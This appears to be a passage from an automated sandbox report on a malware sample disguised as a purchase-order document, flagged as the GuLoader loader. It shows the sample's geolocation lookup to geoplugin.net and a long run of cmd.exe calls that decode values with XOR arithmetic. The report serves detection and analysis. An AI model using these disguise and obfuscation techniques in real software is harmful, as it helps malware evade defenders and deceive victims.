                                                                                                                                                              Apr 26, 2024 09:41:54.382679939 CEST1289INData Raw: 52 c4 18 5d e4 df 17 c5 41 00 8b 06 32 a4 9f 5e 14 80 a9 91 4c 1b d7 b6 11 b6 91 97 eb 8f 0f 6e 7e 25 02 24 bc 48 18 90 a5 7e 2f 2a 86 22 ec dc ce ea f1 71 9c 21 ce fb 3c 1b 8b 4a a4 82 bb 56 f5 d0 e2 84 18 22 54 2a 78 83 05 4c 30 62 1a 04 db 6e
                                                                                                                                                              Data Ascii: R]A2^Ln~%$H~/*"q!<JV"T*xL0bnVj %mMT&J?0:p6FCN7+X89wQ;KX~Vbl2,G+6esN|idBlux(Jc^H_4


                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                              1192.168.11.2050303178.237.33.50807048C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                              Apr 26, 2024 09:42:03.792414904 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                                                              Host: geoplugin.net
                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                              Apr 26, 2024 09:42:03.984844923 CEST1196INHTTP/1.1 200 OK
                                                                                                                                                              date: Fri, 26 Apr 2024 07:42:03 GMT
                                                                                                                                                              server: Apache
                                                                                                                                                              content-length: 988
                                                                                                                                                              content-type: application/json; charset=utf-8
                                                                                                                                                              cache-control: public, max-age=300
                                                                                                                                                              access-control-allow-origin: *
                                                                                                                                                              Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 34 2e 31 36 2e 34 39 2e 34 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 44 43 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 44 69 73 74 72 69 63 74 20 6f 66 20 43 6f 6c 75 6d 62 69 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 35 31 31 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 4e 41 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 4e 6f 72 74 68 20 41 6d 65 72 69 63 61 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 33 38 2e 38 39 34 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 37 2e 30 33 36 35 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 55 53 44 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 24 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 0a 7d
                                                                                                                                                              Data Ascii: { "geoplugin_request":"154.16.49.41", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Washington", "geoplugin_region":"District of Columbia", "geoplugin_regionCode":"DC", "geoplugin_regionName":"District of Columbia", "geoplugin_areaCode":"", "geoplugin_dmaCode":"511", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"38.894", "geoplugin_longitude":"-77.0365", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Click to dive into process behavior distribution

                                                                                                                                                              Click to jump to process

                                                                                                                                                              Target ID:5
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"
                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                              File size:771'320 bytes
                                                                                                                                                              MD5 hash:DBE4440D32DC0B20DEE76C192587AB33
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000005.00000002.56133826946.00000000008BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000005.00000002.56133826946.00000000008FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.56135197649.0000000008643000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Reputation:low
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:6
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "250^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:7
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:8
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "244^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:9
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "227^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:11
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:12
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "255^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:09:41:03
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:14
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "244^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:15
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "253^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:17
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:18
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "130^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:19
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "131^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:22
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "139^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:23
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:24
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "139^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:25
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:26
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "242^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:27
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:28
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "195^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:29
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:30
                                                                                                                                                              Start time:09:41:04
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "212^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:31
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:32
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "208^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:33
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:34
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "197^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:35
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:36
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "212^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:37
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:875'008 bytes
                                                                                                                                                              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:38
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              Wow64 process (32bit):
                                                                                                                                                              Commandline:cmd.exe /c set /a "247^177"
                                                                                                                                                              Imagebase:
                                                                                                                                                              File size:236'544 bytes
                                                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                              Has elevated privileges:
                                                                                                                                                              Has administrator privileges:
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:39
                                                                                                                                                              Start time:09:41:05
                                                                                                                                                              Start date:26/04/2024
                                                                                                                                                              Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                              Wow64 process (32bit):
